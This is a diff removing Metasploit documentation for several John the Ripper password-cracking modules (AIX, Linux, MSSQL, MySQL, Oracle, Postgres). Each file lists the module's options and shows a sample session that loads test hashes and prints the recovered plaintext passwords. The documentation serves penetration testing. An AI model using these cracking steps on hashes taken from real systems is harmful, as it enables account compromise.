-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
-Session completed
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] des_passphrase:????????se
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_aix) > creds
-Credentials
-===========
-
-host  origin  service  public          private                   realm  private_type        JtR Format
-----  ------  -------  ------          -------                   -----  ------------        ----------
-                       des_passphrase  ????????se                       Password            
-                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
-                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
-                       des_password    password                         Password            
-
-```

documentation/modules/auxiliary/analyze/jtr_linux.md

@@ -1,176 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
-  based password hashes, such as:
-
-  * `DES` based passwords  
-  * `MD5` based passwords
-  * `BSDi` based passwords
-  * With `crypt` set to `true`:
-    * `bf`, `bcrypt`, or `blowfish` based passwords
-    * `SHA256` based passwords
-    * `SHA512` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
-  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
-
-## Verification Steps
-
-  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_linux```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CRYPT**
-
-   Include `blowfish` and `SHA`(256/512) passwords.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
-creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
-creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
-creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
-creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_linux 
-msf5 auxiliary(analyze/jtr_linux) > set crypt true
-crypt => true
-msf5 auxiliary(analyze/jtr_linux) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
-[*] Cracking md5crypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] md5_password:password
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[*] Cracking bsdicrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] bsdi_password:password
-[*] Cracking crypt hashes in normal wordlist mode...
-Warning: hash encoding string length 20, type id #4
-appears to be unsupported on this system; will not load such hashes.
-Warning: hash encoding string length 60, type id $2
-appears to be unsupported on this system; will not load such hashes.
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] md5_password:password
-[+] sha256_password:password
-[+] sha512_password:password
-[*] Cracking bcrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] blowfish_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_linux) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                             realm  private_type        JtR Format
-----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
-                       bsdi_password      password                                                                                                   Password            
-                       des_password       password                                                                                                   Password            
-                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
-                       md5_password       password                                                                                                   Password            
-                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
-                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
-                       sha512_password    password                                                                                                   Password            
-                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
-                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
-                       sha256_password    password                                                                                                   Password            
-                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
-                       blowfish_password  password                                                                                                   Password            
-
-```

documentation/modules/auxiliary/analyze/jtr_mssql_fast.md

@@ -1,157 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
-  SQL based password hashes, such as:
-
-  * `mssql` based passwords
-  * `mssql05` based passwords
-  * `mssql12` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
-creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
-creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mssql_fast 
-msf5 auxiliary(analyze/jtr_mssql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
-[*] Cracking mssql05 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[*] Cracking mssql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql_foo:FOO
-[+] mssql_foo:FOO
-[*] Cracking mssql12 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql12_Password1!:Password1!
-[+] mssql12_Password1!:Password1!
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mssql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
-----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
-                       mssql05_toto        toto                                                                                                                                                   Password            
-                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
-                       mssql_foo           FOO                                                                                                                                                    Password            
-                       mssql_foo           foo                                                                                                                                                    Password            
-                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
-                       mssql12_Password1!  Password1!                                                                                                                                             Password            
-                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
-
-```

documentation/modules/auxiliary/analyze/jtr_mysql_fast.md

@@ -1,139 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
-  based password hashes, such as:
-
-  * `mysql` (pre 4.1) based passwords
-  * `mysql-sha1` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
-creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mysql_fast 
-msf5 auxiliary(analyze/jtr_mysql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
-[*] Cracking mysql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql_probe:probe
-[*] Cracking mysql-sha1 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql-sha1_tere:tere
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mysql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public           private                                    realm  private_type        JtR Format
-----  ------  -------  ------           -------                                    -----  ------------        ----------
-                       mysql_probe      probe                                             Password            
-                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
-                       mysql-sha1_tere  tere                                              Password            
-                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
-
-```

documentation/modules/auxiliary/analyze/jtr_oracle_fast.md

@@ -1,168 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
-  based password hashes, such as:
-
-  * `oracle` (<=10) aka `des` based passwords
-  * `oracle11` based passwords
-  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
-  * `oracle12c` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  For a detailed explanation of Oracle 11/12c formats, see
-  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
-
-  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
-  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
-
-## Verification Steps
-
-  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
-creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
-creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_oracle_fast 
-msf5 auxiliary(analyze/jtr_oracle_fast) > run
-
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
-[*] Cracking oracle hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] simon:A
-[+] SYSTEM:THALES
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
-[*] Cracking dynamic_1506 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1506 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
-[*] Cracking oracle11 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle11 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] DEMO:epsilon
-[+] oracle11_epsilon:epsilon
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
-[*] Cracking oracle12c hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle12c hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] oracle12c_epsilon:epsilon
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_oracle_fast) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
-----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
-                       simon              A                                                                                                                                                                                                                                                                            Password            
-                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
-                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
-                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
-
-```

documentation/modules/auxiliary/analyze/jtr_postgres_fast.md

@@ -1,131 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
-  based password hashes, such as:
-
-  * `postgres` based passwords
-  * `raw-md5` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
-  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
-
-## Verification Steps
-
-  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_postgres_fast 
-msf5 auxiliary(analyze/jtr_postgres_fast) > run
-
-[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
-[*] Cracking dynamic_1034 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] example:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_postgres_fast) > creds
-Credentials
-===========
-
-host  origin  service  public   private                              realm  private_type  JtR Format
-----  ------  -------  ------   -------                              -----  ------------  ----------
-                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
-                       example  password                                    Password      
-
-```

documentation/modules/auxiliary/analyze/jtr_windows_fast.md

@@ -1,158 +0,0 @@
-## Vulnerable Application
-
